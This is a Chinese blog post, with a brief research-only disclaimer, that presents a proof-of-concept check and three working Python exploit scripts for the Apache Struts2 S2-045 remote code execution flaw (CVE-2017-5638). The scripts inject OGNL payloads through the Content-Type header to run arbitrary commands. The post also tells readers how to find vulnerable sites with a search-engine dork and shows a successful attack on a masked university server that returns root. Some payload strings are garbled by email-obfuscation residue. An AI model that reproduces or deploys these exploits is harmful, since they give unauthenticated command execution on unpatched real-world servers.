申明:本文所介绍的脚本和方法均来自互联网,收集的目的仅供安全研究使用,网站运维人员可以使用本文介绍的脚本和方法评估自身网站的安全性,并尽快发现和修复网站存在的漏洞。对于使用本文脚本和方法所造成的任何后果,由使用者自行承担,作者不承担任何后果。
S2-045漏洞为一个远程RCE漏洞,利用该漏洞不需要任何的前提条件,因此危害巨大,估计又会造成一场腥风血雨。
漏洞POC如下:
import requests
import sys
def poc(url):
payload = "%{(#test=‘multipart/form-data‘).(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container‘]).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@[email protected]().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}"
headers = {}
headers["Content-Type"] = payload
r = requests.get(url, headers=headers)
if "105059592" in r.content:
return True
return False
if __name__ == ‘__main__‘:
if len(sys.argv) == 1:
print "python s2-045.py target"
sys.exit()
if poc(sys.argv[1]):
print "vulnerable"
else:
print "not vulnerable"
利用代码1
目前一个主要的漏洞利用EXP如下:
#!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib2
import httplib
def exploit(url, cmd):
payload = "%{(#_=‘multipart/form-data‘)."
payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload += "((#container=#context[‘com.opensymphony.xwork2.ActionContext.container‘])."
payload += "(#ognlUtil=#container.getInstance(@[email protected]))."
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
payload += "(#ognlUtil.getExcludedClasses().clear())."
payload += "(#context.setMemberAccess(#dm))))."
payload += "(#cmd=‘%s‘)." % cmd
payload += "(#iswin=(@[email protected]ty(‘os.name‘).toLowerCase().contains(‘win‘)))."
payload += "(#cmds=(#iswin?{‘cmd.exe‘,‘/c‘,#cmd}:{‘/bin/bash‘,‘-c‘,#cmd}))."
payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
payload += "(#ros=(@[email protected]().getOutputStream()))."
payload += "(@[email protected](#process.getInputStream(),#ros))."
payload += "(#ros.flush())}"
try:
headers = {‘User-Agent‘: ‘Mozilla/5.0‘, ‘Content-Type‘: payload}
request = urllib2.Request(url, headers=headers)
page = urllib2.urlopen(request).read()
except httplib.IncompleteRead, e:
page = e.partial
print(page)
return page
if __name__ == ‘__main__‘:
import sys
if len(sys.argv) != 3:
print("[*] struts2_S2-045.py <url> <cmd>")
else:
print(‘[*] CVE: 2017-5638 - Apache Struts2 S2-045‘)
url = sys.argv[1]
cmd = sys.argv[2]
print("[*] cmd: %s\n" % cmd)
exploit(url, cmd)
怎样寻找目标?太简单了,用google hacking。在搜索引擎中寻找目标很简单:inurl .action
目测目前80%以上的网站还没有升级,因此找到的目标一测一个准:
[email protected]:/home/pentest# ./s2-045.py http://www.****.edu.cn/graduate.action "whoami" [*] CVE: 2017-5638 - Apache Struts2 S2-045 [*] cmd: whoami root
广大的网站管理员们尽快行动起来吧,估计很多网站都已经被拿下了,如果目前你的网站还没有被拿下,那么不需要恭喜你,因为那是你的网站价值不够高 :)))
利用脚本2
#! /usr/bin/env python
# encoding:utf-8
import urllib2
import sys
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
def poc():
register_openers()
datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})
header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
header["Content-Type"]="%{(#nike=‘multipart/form-data‘).(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container‘]).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=‘ifconfig‘).(#iswin=(@[email protected](‘os.name‘).toLowerCase().contains(‘win‘))).(#cmds=(#iswin?{‘cmd.exe‘,‘/c‘,#cmd}:{‘/bin/bash‘,‘-c‘,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}"
request = urllib2.Request(str(sys.argv[1]),datagen,headers=header)
response = urllib2.urlopen(request)
print response.read()
poc()
利用脚本3
#encoding:utf-8
import urllib2
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
def poc(w_url):
cmd = raw_input(‘command \n‘)
register_openers()
datagen, header = multipart_encode({"image1": ‘23333‘})
header[
"User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
header[
"Content-Type"] = "%{(#nike=‘multipart/form-data‘).(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)(#container=#context[‘com.opensymphony.xwork2.ActionContext.container‘]).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=‘" + cmd + "‘).(#iswin=(@[email protected](‘os.name‘).toLowerCase().contains(‘win‘))).(#cmds=(#iswin?{‘cmd.exe‘,‘/c‘,#cmd}:{‘/bin/bash‘,‘-c‘,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}"
request = urllib2.Request(w_url, datagen, headers=header)
response = urllib2.urlopen(request).read()
print(response)
if __name__==‘__main__‘:
print ‘blog : http://www.cuijianxiong.com‘
w_url = raw_input(‘addrs : \n‘)
is_shutdown = 1
while is_shutdown == 1:
poc(w_url)
时间: 2024-12-27 23:44:00